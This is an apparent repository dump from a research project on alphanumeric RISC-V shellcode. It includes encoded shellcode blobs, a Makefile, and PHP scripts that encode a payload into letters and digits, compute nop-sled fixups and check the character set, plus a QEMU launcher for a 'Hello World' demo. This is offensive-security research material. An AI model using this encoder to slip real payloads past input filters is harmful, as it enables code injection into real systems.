BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBCGEDEDDDOEEDEEDDGEEEECEDGEEDEDLAKJDDDBDDEDDNCMCDDDDDGMCLCFFDCOBGEDDEGDCHCDDDALCDLMFHGDCHCDDDACOKEDAPFLDLDDDDDDDDLPABHBHBKBHFDFCCKBFCHBbPEFNDDDDDBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB3Y0A3Q/ABj/8Aa/8Aa1J3RHA3Z0A/0Ac/8AD//Aa/2AA9a9a9a9a9a9a9a9a9a9a9a9a9a9a9a9a9a9a9a9a9a9a9a9a9a9a3Z0A/0Ac/8AD75/AIJ3SEA131313//aDAa3Z0A/0Ac/8AD75xW1J3SEAi3//aDAa3Z0A/0Ac/8AD7EqY1J3SEAY3//aDAa3Z0A/0Ac/8AD7EpQ9J3ZEA//AAAa3Z0A/0Ac/8AD75gA9J3SEAy3//aDAa3Z0A/0Ac/8AD7ETX1J3SEAY3//aDAa3Z0A/0Ac/8AD7ElX1J3SEAY3//aDAa3Z0A/0Ac/8AD75PP9J3ZEA//AAAa3Z0A/0Ac/8AD7/zX1I3Z/A//AAAa3Z0A/0Ac/8AD75r05J3ZEA//AAAa3Z0A/0Ac/8AD7EBA9J3ZEA//AAAa3Z0A/0Ac/8AD7/F/1Im93S/Au3//aDAa3Z0A/0Ac/8AD7Ea85J3SEAY3//aDAa3Z0A/0Ac/8AD7UpP1J3ZEA//AAAa3Z0A/0Ac/8AD75aQ1J3SEAY3A3//aDAa3Z0A/0Ac/8AD7///1Ia93S/AY3M31313//aDAa3Z0A/0Ac/8AD75/AIJ3SEA131313//aDAa3Z0A/0Ac/8AD7/h91I3Z/A//AAAaySySySySySySySs0A4


--------------------------------------------------------------------------------
/baremetal/prebuilt/tick.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RischardV/riscv-alphanumeric-shellcoding/c3f3b1b445ef2b198963a6cbffd04d6f9559c000/baremetal/prebuilt/tick.bin


--------------------------------------------------------------------------------
/baremetal/scripts:
--------------------------------------------------------------------------------
1 | ../scripts/


--------------------------------------------------------------------------------
/baremetal/slash/.gdbinit:
--------------------------------------------------------------------------------
1 | target remote :1235
2 | layout next
3 | layout next
4 | layout next
5 | layout next
6 | layout next
7 | set riscv use_compressed_breakpoints no
8 | 


--------------------------------------------------------------------------------
/baremetal/slash/.gitignore:
--------------------------------------------------------------------------------
1 | build
2 | 


--------------------------------------------------------------------------------
/baremetal/slash/Makefile:
--------------------------------------------------------------------------------
 1 | #
 2 | # (c) 2018-2019 Hadrien Barral
 3 | # SPDX-License-Identifier: Apache-2.0
 4 | #
 5 | 
 6 | RV_ABI    := rv64iac
 7 | include ../scripts/common.mk
 8 | NAME      := shellcode
 9 | PAYD      := payload_serial
10 | 
11 | all: $(NAME).bin
12 | 
13 | $(BUILD):
14 | 	$(Q)mkdir -p $@
15 | 
16 | $(BUILD)/stage1_nofixup.o: stage1.S $(BUILD)/stage2_encoded.S
17 | 	$(Q)m4 -I $(BUILD) $< > $(BUILD)/$<.m4.S
18 | 	$(Q)$(GCC) -DCOMPUTE_XP_FIXUP -o $(BUILD)/$<.i -P -E $(BUILD)/$<.m4.S
19 | 	$(Q)$(AS) $(ASFLAGS)   -o $@ -c $(BUILD)/$<.i
20 | 
21 | $(BUILD)/xp_fixup.S: $(BUILD)/stage1_nofixup.o compute_fixup.php
22 | 	$(Q)$(OBJDUMP) -x $< | grep step6 | awk '{print $$1}' > $@.step6_value
23 | 	$(Q)php $(word 2,$^) -i $@.step6_value -o $@
24 | 
25 | $(BUILD)/stage1.o: stage1.S $(BUILD)/stage2_encoded.S $(BUILD)/xp_fixup.S
26 | 	$(Q)m4 -I $(BUILD) $< > $(BUILD)/$<.m4.S
27 | 	$(Q)$(GCC) -o $(BUILD)/$<.i -P -E $(BUILD)/$<.m4.S
28 | 	$(Q)$(AS) $(ASFLAGS)   -o $@ -c $(BUILD)/$<.i
29 | 
30 | $(BUILD)/stage1.elf: $(BUILD)/stage1.o stage1.ld
31 | 	$(Q)$(LD) $(LDFLAGS) -T $(word 2,$^) -o $@ $<
32 | 
33 | $(BUILD)/stage1.bin: $(BUILD)/stage1.elf
34 | 	$(Q)$(OBJCOPY) -O binary $< $@
35 | 
36 | $(BUILD)/$(NAME).bin.nocheck: $(BUILD)/stage1.bin $(BUILD)/$(PAYD).bin \
37 |                               $(BUILD)/stage1.o insert.php $(BUILD)/stage2_encoded.S
38 | 	$(Q)$(OBJDUMP) -x $(word 3,$^) | grep step6 | awk '{print $$1}' > $@.step6_value
39 | 	$(Q)grep "^next_block$$" $(word 5,$^) | wc -l > $@.stage2_value
40 | 	$(Q)php $(word 4,$^) -i $< -p $(word 2,$^) -v $@.step6_value -t $@.stage2_value -o $@
41 | 
42 | $(NAME).bin: $(BUILD)/$(NAME).bin.nocheck check.php
43 | 	$(Q)php $(word 2,$^) -i $< -c "A-Za-z0-9\/"
44 | 	$(Q)cp $< $@
45 | 
46 | $(BUILD)/stage2.o: stage2.S | $(BUILD)
47 | 	$(Q)$(GCC) -o $(BUILD)/$<.i -P -E $<
48 | 	$(Q)$(AS) $(ASFLAGS)   -o $@ $(BUILD)/$<.i
49 | 
50 | $(BUILD)/stage2.bin: $(BUILD)/stage2.o
51 | 	$(Q)$(OBJCOPY) -O binary $< $@
52 | 
53 | $(BUILD)/stage2_encoded.S: $(BUILD)/stage2.bin encode_stage2.php $(BUILD)/loadgen.json
54 | 	$(Q)php $(word 2,$^) -i $< -o $@ -l $(word 3,$^)
55 | 
56 | $(BUILD)/loadgen: loadgen.cpp
57 | 	$(Q)g++ -Wall -Wextra -O3 -march=native -pthread -std=gnu++17 -fconcepts $< -o $@
58 | 
59 | $(BUILD)/loadgen.json: $(BUILD)/loadgen ../lists/slash_64.txt
60 | 	$(Q)$< $@ $(word 2,$^) $(BUILD)/loadgen.split
61 | 
62 | include ../payload/payload.mk
63 | $(eval $(call build_payload,$(PAYD),0x8000800580,$(BUILD)/$(PAYD).bin))
64 | 
65 | clean:
66 | 	$(Q)rm -rf $(BUILD) $(NAME).bin
67 | 


--------------------------------------------------------------------------------
/baremetal/slash/README.txt:
--------------------------------------------------------------------------------
1 | This folder contains the 'Hello World' /RV64IAC demo on QEMU.
2 | 


--------------------------------------------------------------------------------
/baremetal/slash/check.php:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/php
 2 | <?php
 3 | /*
 4 |  * (c) 2018-2019 Hadrien Barral
 5 |  * SPDX-License-Identifier: Apache-2.0
 6 |  */
 7 | 
 8 | 	$args = getopt('i:c:');
 9 | 
10 | 	$f = file_get_contents($args['i']);
11 | 
12 | 	$regex = "/[".$args['c']."]/";
13 | 
14 | 	/* For debug */
15 | 	function not_alnum_verbose(&$f, $regex) {
16 | 		$len = strlen($f);
17 | 		for ($i=0; $i<$len; $i++) {
18 | 			$c = $f[$i];
19 | 			if (preg_replace($regex, '', $c) !== '') {
20 | 				printf("Not alnum (0x%x)!\n", $i);
21 | 				return;
22 | 			}
23 | 		}
24 | 	}
25 | 
26 | 	if (preg_replace($regex, '', $f) !== '') {
27 | 		not_alnum_verbose($f, $regex);
28 | 		//exit(0); /* For dev */
29 | 		exit(1);
30 | 	}
31 | ?>


--------------------------------------------------------------------------------
/baremetal/slash/compute_fixup.php:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/php
 2 | <?php
 3 | /*
 4 |  * (c) 2018-2019 Hadrien Barral
 5 |  * SPDX-License-Identifier: Apache-2.0
 6 |  */
 7 | 
 8 | $args = getopt('i:o:');
 9 | 
10 | $f = file_get_contents($args['i']);
11 | 
12 | $step6_offset = intval($f, 16);
13 | $xp_init_value = 8; /* Sync with 'jal step1' */
14 | if($step6_offset < $xp_init_value) {
15 | 	die("Oops. Please improve the algorithm (1).");
16 | }
17 | $xp_offset = $step6_offset - $xp_init_value;
18 | $addi_cost = 2;
19 | $sp_ops = [112,-112,144,-144,16,-160,176,-176,-192,208,-208,240,-240,
20 |            272,-272,304,-304,320,336,-336,352,368,-368,400,-400,-432,
21 | 		   448,464,-464,48,-48,-496,-64,80];
22 | 
23 | foreach($sp_ops as &$e) {
24 | /* Negative weights are difficult to handle.
25 |    Here, they would not make the optimal better than more than a single instruction.
26 |    (because [1-29] can be made by at most the sum of 2 values)
27 |    Let us drop them. */
28 | 	if($e < 0) {
29 | 		unset($sp_ops[$e]);
30 | 	} else {
31 | 		$e -= 2; /* Remove the cost from the instruction itself */
32 | 	}
33 | }
34 | sort($sp_ops);
35 | /* We now have 1,3,5,7,9,11,13,15,17,19,20,21,22,23,25,28,29 */
36 | 
37 | /* We need quite a lot of 464, and we have 448 available.
38 |  * Thus we simply need to compute an upper bound with 464,
39 |  * then switch some of the 464 to 448 to get down at close
40 |  * as possible to the target.
41 |  */
42 | 
43 | $v464 = 464-$addi_cost;
44 | $v448 = 448-$addi_cost;
45 | 
46 | if($xp_offset == 0) {
47 | 	die("Oops. Please improve the algorithm (2).");
48 | }
49 | 
50 | $n464 = ceil($xp_offset / $v464); /* quotient */
51 | $r464 = $v464 - ($xp_offset % $v464); /* remainder */
52 | $n448 = floor($r464 / ($v464-$v448));
53 | 
54 | $n464 -= $n448;
55 | if($n464 < 0) {
56 | 	die("Oops. Please improve the algorithm (3).");
57 | }
58 | 
59 | $r448 = $n464*$v464 + $n448*$v448 - $xp_offset;
60 | if(($r448%2) !== 0) {
61 | 	die("Oops. Please improve the algorithm (4).");
62 | }
63 | $end_nopsled = $r448 / 2;
64 | 
65 | $s = ".macro xp_fixup\n".
66 | 	 sprintf("    # n464:%d n448:%d\n", $n464, $n448).
67 | 	 str_repeat("    addi XP, XP, 464\n", $n464).
68 | 	 str_repeat("    addi XP, XP, 448\n", $n448).
69 | 	 ".endm\n".
70 | 	 ".macro end_nopsled\n".
71 | 	 sprintf("    # len:%d\n", $end_nopsled).
72 | 	 str_repeat("    dangerous_nop2\n", $end_nopsled).
73 | 	 ".endm\n";
74 | file_put_contents($args['o'], $s);
75 | 
76 | ?>


--------------------------------------------------------------------------------
/baremetal/slash/encode_stage2.php:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/php
 2 | <?php
 3 | /*
 4 |  * (c) 2018-2019 Hadrien Barral
 5 |  * SPDX-License-Identifier: Apache-2.0
 6 |  */
 7 | 
 8 | $args = getopt('i:o:l:');
 9 | 
10 | $t = json_decode(file_get_contents($args['l']), true);
11 | 
12 | if(gettype($t) !== 'array') {
13 | 	die("loadgen.json load failed\n");
14 | }
15 | 
16 | $f = file_get_contents($args['i']);
17 | 
18 | $s = '';
19 | 
20 | $l = strlen($f);
21 | 
22 | $fenci_str = "
23 | lui     a0,0x412f3
24 | li      s4,18
25 | sra     t1,a0,s4
26 | addiw   t1,t1,-20
27 | addiw   t1,t1,-20
28 | addiw   t1,t1,-20
29 | amoor.w.aq t5,t1,(sp)
30 | ";
31 | 
32 | for($i=0; $i<$l; $i+=16) {
33 | 	if($i+15>=$l) {
34 | 		die("Invalid binary size. Missing filler?");
35 | 	}
36 | 	$value = ord($f[$i]) + ((ord($f[$i+1])) << 8);
37 | 	$next = ord($f[$i+2]) + ((ord($f[$i+3])) << 8);
38 | 	if($value == 0xFFFF) {
39 | 		die("Found 0xFFFF. Missing filler?\n");
40 | 	}
41 | 	$s .= "init_block\n";
42 | 	if(($value === 0x100F) && ($next === 0x0000)) {
43 | 		$s .= sprintf("# Loading fenci\n", $fenci_str);
44 | 		$s .= $fenci_str;
45 | 	} else if(isset($t[$value])) {
46 | 		$s .= sprintf("# Loading 0x%x\n%s\n", $value, $t[$value]['txt']);
47 | 	} else {
48 | 		printf("Nomatch [i:0x%x]: 0x%x\n", $i, $value);
49 | 		exit(1);
50 | 	}
51 | 	$s .= "next_block\n";
52 | }
53 | 
54 | file_put_contents($args['o'], $s);
55 | ?>


--------------------------------------------------------------------------------
/baremetal/slash/insert.php:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/php
 2 | <?php
 3 | /*
 4 |  * (c) 2018-2019 Hadrien Barral
 5 |  * SPDX-License-Identifier: Apache-2.0
 6 |  */
 7 | 
 8 | 	function error($errno, $errstr, $errfile, $errline) {
 9 | 		throw new ErrorException($errstr, $errno, 0, $errfile, $errline);
10 | 	}
11 | 	set_error_handler('error');
12 | 
13 | 	$args = getopt('i:p:v:t:o:');
14 | 
15 | 	$s = file_get_contents($args['i']); /* Input file */
16 | 	$p = file_get_contents($args['p']); /* Payload */
17 | 	$v = file_get_contents($args['v']); /* step6 offset to compute pool offset */
18 | 	$v = intval($v, 16);
19 | 	$t = file_get_contents($args['t']); /* stage2 sp shift */
20 | 	$t = intval($t, 10);
21 | 	$b = $v - 0x1000 + (16*$t) + 4;  /* Sync with stage2 start load address */
22 | 	$maxpayload = 0x400; /* It is possible to increase it with minor work */
23 | 
24 | 	if(strlen($p) > $maxpayload) {
25 | 		printf("Payload too large: %d/%d\n", strlen($p), $maxpayload);
26 | 		exit(-1);
27 | 	}
28 | 	printf("insert: %d bytes from offset:0x%x\n", 2*strlen($p), $b);
29 | 	for($i=0; $i<min($maxpayload, strlen($p)); $i++)
30 | 	{
31 | 		/* [Notation: capital letters are hex digits]
32 | 		 * We want to encode byte 'XY' in alnum bytes 'KA' 'LB'.
33 | 		 * The equation to solve (see stage2.S) is:
34 | 		 * XY == KA ^ BK, ('XY'€[0;255], 'KA' and 'LB' alnum]
35 | 		 */
36 | 		$q = ord($p[$i]);
37 | 		$wanted_bottom  = $q & 0xF;
38 | 		$wanted_top = ($q >> 4) & 0xF;
39 | 
40 | 		$low_top = 0x4;
41 | 		if($wanted_bottom == 0x4) {
42 | 			$low_top = 0x6;
43 | 		}
44 | 		$low_bottom = $wanted_bottom ^ $low_top;
45 | 
46 | 		$high_bottom = $wanted_top ^ $low_top;
47 | 		$high_top = ($high_bottom == 0) ? 0x5 : 0x4;
48 | 
49 | 		$low  = ($low_top << 4) + $low_bottom;
50 | 		$high = ($high_top << 4) + $high_bottom;
51 | 
52 | 		$s[$b+2*$i  ] = chr($low);
53 | 		$s[$b+2*$i+1] = chr($high);
54 | 
55 | 		//printf("INS: %X -> %X %X\n", $q, $low, $high);
56 | 	}
57 | 	file_put_contents($args['o'], $s);
58 | ?>
59 | 


--------------------------------------------------------------------------------
/baremetal/slash/l:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | CMD="qemu-system-riscv64 -nographic -machine sifive_u -device loader,file=shellcode.bin,addr=0x80000000"
3 | #CMD="qemu-system-riscv64 -gdb tcp::1235 -machine sifive_u -device loader,file=shellcode.bin,addr=0x80000000 -S"
4 | echo "$CMD"
5 | ${CMD}
6 | 


--------------------------------------------------------------------------------
/baremetal/slash/shellcode.bin:
--------------------------------------------------------------------------------
1 | ySySo/0/BBBBB03JBBBBBBBBBBBBBPCJBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB